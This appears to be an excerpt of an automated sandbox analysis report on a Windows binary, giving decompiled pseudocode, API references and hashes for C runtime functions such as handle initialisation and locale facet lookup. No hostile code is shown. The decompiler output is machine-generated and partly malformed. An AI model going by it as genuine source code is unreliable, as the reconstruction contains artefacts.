Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: 207d4ce7d5692e252ca6a9ed36470bfcb53760eb3db9456d1dd29c8cd79b8ed1
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: EFB09260A614C05AEB22C3288455B0576F0A740B02F8D84E0A00582881C25C8A84E200

Uniqueness

Uniqueness Score: -1.00%

Function 00C65567, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B7CA, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C4B7CA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0xc5d4c0);
				E00C4AF50(__ebx, __edi, __esi);
				E00C46AD0(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0xcc7560 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E00C47C92();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0xcc7560 = _t81;
						 *0xcc7558 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0xcc7560;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0xcc7560 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0xcc7674;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -13399380
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E00C4BA8E();
							L2:
							_t86 = 1;
							L3:
							return E00C4AF95(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0xcc7558 < _t135) {
							_t138 = E00C47C92(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0xcc7560[_t149] = _t138;
								 *0xcc7558 =  *0xcc7558 + _t141;
								while(_t138 <  &(0xcc7560[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0xcc7558;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0xcc7560[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E00C51EF0(_t155, 0xc5f9b8, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E00C51EF0(_t155, 0xc5f9b8, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x00c4b7ca
0x00c4b7cc
0x00c4b7d1
0x00c4b7d8
0x00c4b7de
0x00c4b7e0
0x00c4b7e9
0x00c4b809
0x00c4b80d
0x00c4b80e
0x00c4b80f
0x00c4b816
0x00c4b818
0x00c4b81d
0x00c4b836
0x00c4b83b
0x00c4b841
0x00c4b84a
0x00c4b850
0x00c4b853
0x00c4b856
0x00c4b85f
0x00c4b862
0x00c4b868
0x00c4b86b
0x00c4b86e
0x00c4b871
0x00c4b874
0x00c4b874
0x00c4b87f
0x00c4b88a
0x00c4b9b9
0x00c4b9b9
0x00c4b9b9
0x00c4b9bf
0x00000000
0x00000000
0x00c4b9ca
0x00c4b9d0
0x00c4b9d6
0x00c4b9eb
0x00c4b9f1
0x00c4b9f8
0x00c4b9fd
0x00c4b9ff
0x00c4b9f3
0x00c4b9f5
0x00c4b9f5
0x00c4ba09
0x00c4ba0e
0x00c4ba55
0x00c4ba5b
0x00c4ba5e
0x00c4ba64
0x00c4ba6b
0x00c4ba70
0x00c4ba70
0x00000000
0x00c4ba14
0x00c4ba15
0x00c4ba1d
0x00000000
0x00000000
0x00c4ba1f
0x00c4ba21
0x00c4ba29
0x00c4ba36
0x00c4ba41
0x00c4ba46
0x00c4ba4a
0x00c4ba50
0x00000000
0x00c4ba50
0x00c4ba3c
0x00c4ba3e
0x00c4ba3e
0x00000000
0x00c4ba3e
0x00c4ba2f
0x00000000
0x00c4ba2f
0x00c4b9dd
0x00c4b9e3
0x00c4ba77
0x00c4ba77
0x00000000
0x00c4ba77
0x00c4b9d6
0x00c4ba7d
0x00c4ba84
0x00c4b7fe
0x00c4b800
0x00c4b801
0x00c4b806
0x00c4b806
0x00c4b890
0x00c4b895
0x00000000
0x00000000
0x00c4b89b
0x00c4b89d
0x00c4b8a0
0x00c4b8a3
0x00c4b8a8
0x00c4b8b2
0x00c4b8b4
0x00c4b8b6
0x00c4b8b6
0x00c4b8bb
0x00c4b8bc
0x00c4b8bf
0x00c4b8d1
0x00c4b8d3
0x00c4b8d8
0x00c4b96c
0x00c4b973
0x00c4b979
0x00c4b989
0x00c4b98f
0x00c4b992
0x00c4b995
0x00c4b999
0x00c4b99f
0x00c4b9a2
0x00c4b9a5
0x00c4b9a8
0x00c4b9a8
0x00c4b9ad
0x00c4b9ae
0x00c4b9b1
0x00000000
0x00c4b9b1
0x00c4b8de
0x00c4b8e4
0x00000000
0x00c4b8e4
0x00c4b8e7
0x00c4b8e9
0x00c4b8ec
0x00c4b8ef
0x00c4b8f2
0x00c4b8fa
0x00c4b8ff
0x00c4b959
0x00c4b959
0x00c4b95a
0x00c4b960
0x00c4b961
0x00c4b964
0x00c4b967
0x00000000
0x00c4b906
0x00c4b906
0x00c4b90a
0x00000000
0x00000000
0x00c4b90e
0x00c4b91e
0x00c4b92b
0x00c4b932
0x00c4b937
0x00c4b93e
0x00c4b946
0x00c4b94a
0x00c4b950
0x00c4b953
0x00c4b956
0x00c4b956
0x00000000
0x00c4b956
0x00c4b911
0x00c4b917
0x00c4b91c
0x00000000
0x00000000
0x00000000
0x00c4b91c
0x00c4b8ff
0x00000000
0x00c4b8f2
0x00c4b82a
0x00c4b832
0x00000000
0x00c4b832
0x00c4b7f6
0x00000000

APIs

__lock.LIBCMT ref: 00C4B7D8

Part of subcall function 00C46AD0: __mtinitlocknum.LIBCMT ref: 00C46AE2
Part of subcall function 00C46AD0: EnterCriticalSection.KERNEL32(00000000,?,00C4AB29,0000000D), ref: 00C46AFB

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C4B7F6
__calloc_crt.LIBCMT ref: 00C4B80F
@_EH4_CallFilterFunc@8.LIBCMT ref: 00C4B82A
GetStartupInfoW.KERNEL32(?,00C5D4C0,00000064), ref: 00C4B87F
__calloc_crt.LIBCMT ref: 00C4B8CA
GetFileType.KERNEL32(00000001), ref: 00C4B911
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00C4B94A
GetStdHandle.KERNEL32(-000000F6), ref: 00C4BA03
GetFileType.KERNEL32(00000000), ref: 00C4BA15
InitializeCriticalSectionAndSpinCount.KERNEL32(-00CC7554,00000FA0), ref: 00C4BA4A

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
String ID:
API String ID: 1456538442-0
Opcode ID: fc3eb3a432f2b5602717643e03dcd78cee71896d5f184acc15fd21a22fbd16b3
Instruction ID: 85c9776fe070a8665ce4cb7ee4b00214844baebecb60fff714596c1fa3180fd8
Opcode Fuzzy Hash: fc3eb3a432f2b5602717643e03dcd78cee71896d5f184acc15fd21a22fbd16b3
Instruction Fuzzy Hash: 9491DE719087458FCB10CFA8C881AADBBB4BF19324B24426ED5A6AB3E1D734DD42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C426BC, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00C426BC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				void* _t22;
				intOrPtr* _t40;
				void* _t43;

				_push(0x14);
				E00C45688(E00C56D9B, __ebx, __edi, __esi);
				E00C43822(_t43 - 0x14, 0);
				_t40 =  *0xcc5718; // 0x0
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				 *((intOrPtr*)(_t43 - 0x10)) = _t40;
				_t17 = E00C41270( *((intOrPtr*)(_t43 + 8)), E00C411C0(0xcc5710));
				_t42 = _t17;
				if(_t17 == 0) {
					if(_t40 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_push(_t43 - 0x10);
						_t22 = E00C42A88(__ebx, _t40, _t42, __eflags);
						__eflags = _t22 - 0xffffffff;
						if(_t22 == 0xffffffff) {
							E00C43CAF(_t43 - 0x20, "bad cast");
							E00C4560A(_t43 - 0x20, 0xc5d6f4);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0xcc5718 = _t42;
						 *((intOrPtr*)( *_t42 + 4))();
						E00C4246A(_t42);
					} else {
						_t42 = _t40;
					}
				}
				E00C4387E(_t43 - 0x14);
				return E00C45665(_t42);
			}

0x00c426bc
0x00c426c3
0x00c426cd
0x00c426d2
0x00c426d8
0x00c426e1
0x00c426ed
0x00c426f2
0x00c426f6
0x00c426fa
0x00c42700
0x00c42706
0x00c42707
0x00c4270e
0x00c42711
0x00c4271b
0x00c42729
0x00c42729
0x00c4272e
0x00c42731
0x00c4273b
0x00c4273f
0x00c426fc
0x00c426fc
0x00c426fc
0x00c426fa
0x00c42748
0x00c42754

APIs

__EH_prolog3.LIBCMT ref: 00C426C3
std::_Lockit::_Lockit.LIBCPMT ref: 00C426CD

Part of subcall function 00C43822: __lock.LIBCMT ref: 00C43833

int.LIBCPMT ref: 00C426E4

Part of subcall function 00C411C0: std::_Lockit::_Lockit.LIBCPMT ref: 00C411D1

codecvt.LIBCPMT ref: 00C42707
std::bad_exception::bad_exception.LIBCMT ref: 00C4271B
__CxxThrowException@8.LIBCMT ref: 00C42729
std::_Facet_Register.LIBCPMT ref: 00C4273F

Strings

bad cast, xrefs: 00C42713

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: 5b0f76c7b28935be473e128a23ab2cdd6942db1c3279a4b4b07558f8e85aa7fd
Instruction ID: 4bb90852bde364bdb5d2b9db57dfd36078fad9c004a5341cccb8785862657aaf
Opcode Fuzzy Hash: 5b0f76c7b28935be473e128a23ab2cdd6942db1c3279a4b4b07558f8e85aa7fd
Instruction Fuzzy Hash: 1A01C036910A189BCF11EBA0C886AEE7375BF54790F910508F820AB2D1DF34AA84A790

Uniqueness

Uniqueness Score: -1.00%

Function 00C4E0FB, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C4E0FB(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E00C4B78F(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E00C52F99(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0xcc7560;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E00C52F99(2);
							if(E00C52F99(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E00C52F99(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E00C52F13(_t35);
					 *((char*)( *((intOrPtr*)(0xcc7560 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E00C44C42(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x00c4e0fe
0x00c4e105
0x00c4e10e
0x00c4e11b
0x00c4e16d
0x00c4e16d
0x00c4e11d
0x00c4e11d
0x00c4e125
0x00c4e133
0x00000000
0x00000000
0x00000000
0x00000000
0x00c4e13b
0x00c4e13b
0x00c4e13d
0x00c4e14f
0x00000000
0x00c4e151
0x00c4e151
0x00c4e161
0x00000000
0x00c4e163
0x00c4e169
0x00c4e169
0x00c4e161
0x00c4e14f
0x00c4e125
0x00c4e170
0x00c4e188
0x00c4e18f
0x00c4e19d
0x00c4e191
0x00c4e198
0x00c4e198
0x00c4e1a2
0x00c4e107
0x00c4e10b
0x00c4e10b

APIs

__ioinit.LIBCMT ref: 00C4E0FE

Part of subcall function 00C4B78F: InitOnceExecuteOnce.KERNEL32(00CC6160,00C4B7CA,00000000,00000000,00C461F5,00C5D1D0,0000000C,00C4266D,?), ref: 00C4B79D

__get_osfhandle.LIBCMT ref: 00C4E112
__get_osfhandle.LIBCMT ref: 00C4E13D
__get_osfhandle.LIBCMT ref: 00C4E146
__get_osfhandle.LIBCMT ref: 00C4E152
CloseHandle.KERNEL32(00000000,?,?,?,00C4E0A6,?,00C5D5D8,00000010,00C45F2D,00000000,?,?,?,?,?), ref: 00C4E159
GetLastError.KERNEL32(?,00C4E0A6,?,00C5D5D8,00000010,00C45F2D,00000000,?,?,?,?,?,?,00C45FAB,?,00C5D168), ref: 00C4E163
__free_osfhnd.LIBCMT ref: 00C4E170
__dosmaperr.LIBCMT ref: 00C4E192

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 3c5b370c36726165bbe5b9946275cc4ea95b0800041c1c674dc37b3d7066bd36
Instruction ID: c4b65d515d12c9922e1ffcd21a14bdfb55a80a24eabbb02af1d2967982eb7405
Opcode Fuzzy Hash: 3c5b370c36726165bbe5b9946275cc4ea95b0800041c1c674dc37b3d7066bd36
Instruction Fuzzy Hash: 7D114C326592301AD62462747849B3E37957B42775F1B0349FD28CB2C3EE30C9C4A250

Uniqueness

Uniqueness Score: -1.00%

Function 00C417A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00C417EE
__CxxThrowException@8.LIBCMT ref: 00C4180B
__CxxThrowException@8.LIBCMT ref: 00C41824
__CxxThrowException@8.LIBCMT ref: 00C4183D

Strings

ios_base::eofbit set, xrefs: 00C41829
ios_base::failbit set, xrefs: 00C41810
ios_base::badbit set, xrefs: 00C417F3

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 0f89392068cf24830320dbb44591da16ac7ae3fa834a0997cb1053bb3137b2d5
Instruction ID: 6e691ffcda09cc157110a84701c75d716e5bb901e69ddd57ca1518be26bc7818
Opcode Fuzzy Hash: 0f89392068cf24830320dbb44591da16ac7ae3fa834a0997cb1053bb3137b2d5
Instruction Fuzzy Hash: 6B01C0B15447046BC710EA64CC82FAA73E8BB10B96F48481DFDA1D61C2DB74E588975A

Uniqueness

Uniqueness Score: -1.00%

Function 00C420F0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C420F0(intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v28;
				void* _t36;
				signed int _t41;
				signed int _t42;
				char _t44;
				intOrPtr _t49;
				signed int _t58;
				intOrPtr* _t62;
				void* _t77;

				E00C43822( &_v16, 0);
				_t58 =  *0xcc5634; // 0x1
				_t44 =  *0xcc7544;
				_v8 = _t44;
				if(_t58 == 0) {
					E00C43822( &_v12, _t58);
					_t77 =  *0xcc5634 - _t58; // 0x1
					if(_t77 == 0) {
						_t41 =  *0xcc5624; // 0x1
						_t42 = _t41 + 1;
						 *0xcc5624 = _t42;
						 *0xcc5634 = _t42;
					}
					E00C4387E( &_v12);
					_t58 =  *0xcc5634; // 0x1
				}
				_t49 =  *_a4;
				if(_t58 >=  *((intOrPtr*)(_t49 + 0xc))) {
					_t62 = 0;
					goto L8;
				} else {
					_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 8)) + _t58 * 4));
					if(_t62 != 0) {
						L16:
						E00C4387E( &_v16);
						return _t62;
					} else {
						L8:
						if( *((char*)(_t49 + 0x14)) == 0) {
							L11:
							if(_t62 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t36 = E00C42492();
							if(_t58 >=  *((intOrPtr*)(_t36 + 0xc))) {
								L12:
								if(_t44 == 0) {
									if(E00C412B0( &_v8, _a4) == 0xffffffff) {
										E00C43CAF( &_v28, "bad cast");
										E00C4560A( &_v28, 0xc5d6f4);
										asm("int3");
										return __imp__rexec();
									}
									_t62 = _v8;
									 *0xcc7544 = _t62;
									 *((intOrPtr*)( *_t62 + 4))();
									E00C4246A(_t62);
									goto L16;
								} else {
									E00C4387E( &_v16);
									return _t44;
								}
							} else {
								_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t36 + 8)) + _t58 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00c420fe
0x00c42103
0x00c42109
0x00c4210f
0x00c42114
0x00c4211a
0x00c4211f
0x00c42125
0x00c42127
0x00c4212c
0x00c4212d
0x00c42132
0x00c42132
0x00c4213a
0x00c4213f
0x00c4213f
0x00c42148
0x00c4214d
0x00c4215b
0x00000000
0x00c4214f
0x00c42152
0x00c42157
0x00c421bb
0x00c421be
0x00c421cb
0x00c42159
0x00c4215d
0x00c42161
0x00c42173
0x00c42175
0x00000000
0x00000000
0x00000000
0x00000000
0x00c42163
0x00c42163
0x00c4216b
0x00c42177
0x00c42179
0x00c421a0
0x00c421d4
0x00c421e2
0x00c421e7
0x00c421e8
0x00c421e8
0x00c421a2
0x00c421a5
0x00c421af
0x00c421b3
0x00000000
0x00c4217b
0x00c42180
0x00c4218d
0x00c4218d
0x00c4216d
0x00c42170
0x00000000
0x00c42170
0x00c4216b
0x00c42161
0x00c42157

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C420FE

Part of subcall function 00C43822: __lock.LIBCMT ref: 00C43833

std::_Lockit::_Lockit.LIBCPMT ref: 00C4211A
std::_Facet_Register.LIBCPMT ref: 00C421B3
std::bad_exception::bad_exception.LIBCMT ref: 00C421D4

Part of subcall function 00C43CAF: std::exception::exception.LIBCMT ref: 00C43CB9

__CxxThrowException@8.LIBCMT ref: 00C421E2

Part of subcall function 00C4560A: RaiseException.KERNEL32(?,?,00C5D720,00000000,?,?,00C410C8,00000000,00C5D720,00000000), ref: 00C4565B

Strings

bad cast, xrefs: 00C421CC

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 3247575091-3145022300
Opcode ID: 54a943e3906001fbacabcebaebeb5a9021fc1045c6742a21953583c34ef027b0
Instruction ID: 148f43755a9d3b6809538a6bb3a1590ab95d9db7ae22295b4b66958e70c3a312
Opcode Fuzzy Hash: 54a943e3906001fbacabcebaebeb5a9021fc1045c6742a21953583c34ef027b0
Instruction Fuzzy Hash: B731BF359001149BCB20DF98DC86EADB7B4FBA4361B9401A9F915A7262DB30BE46DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C410D0, Relevance: 10.6, APIs: 7, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C410D0(signed int* __ecx, void* __esi) {
				signed int _t20;
				signed int* _t32;
				signed int* _t36;
				void* _t38;
				void* _t39;

				_t36 = __ecx;
				E00C425B8(__ecx);
				_t14 = _t36[0xb];
				_t39 = _t38 + 4;
				if(_t36[0xb] != 0) {
					E00C44444(_t14);
					_t39 = _t39 + 4;
				}
				_t36[0xb] = 0;
				_t15 = _t36[9];
				if(_t36[9] != 0) {
					E00C44444(_t15);
					_t39 = _t39 + 4;
				}
				_t36[9] = 0;
				_t16 = _t36[7];
				if(_t36[7] != 0) {
					E00C44444(_t16);
					_t39 = _t39 + 4;
				}
				_t36[7] = 0;
				_t17 = _t36[5];
				if(_t36[5] != 0) {
					E00C44444(_t17);
					_t39 = _t39 + 4;
				}
				_t36[5] = 0;
				_t18 = _t36[3];
				if(_t36[3] != 0) {
					E00C44444(_t18);
					_t39 = _t39 + 4;
				}
				_t36[3] = 0;
				_t19 = _t36[1];
				if(_t36[1] != 0) {
					E00C44444(_t19);
				}
				_t36[1] = 0;
				_t32 = _t36;
				_t20 =  *_t32;
				if(_t20 != 0) {
					if(_t20 < 4) {
						return E00C43C86(0xcc57e8 + _t20 * 0x18, 0xcc57e8 + _t20 * 0x18);
					}
					return _t20;
				} else {
					return E00C46C34(0xc);
				}
			}

0x00c410d1
0x00c410d4
0x00c410d9
0x00c410dc
0x00c410e1
0x00c410e4
0x00c410e9
0x00c410e9
0x00c410ec
0x00c410f3
0x00c410f8
0x00c410fb
0x00c41100
0x00c41100
0x00c41103
0x00c4110a
0x00c4110f
0x00c41112
0x00c41117
0x00c41117
0x00c4111a
0x00c41121
0x00c41126
0x00c41129
0x00c4112e
0x00c4112e
0x00c41131
0x00c41138
0x00c4113d
0x00c41140
0x00c41145
0x00c41145
0x00c41148
0x00c4114f
0x00c41154
0x00c41157
0x00c4115c
0x00c4115f
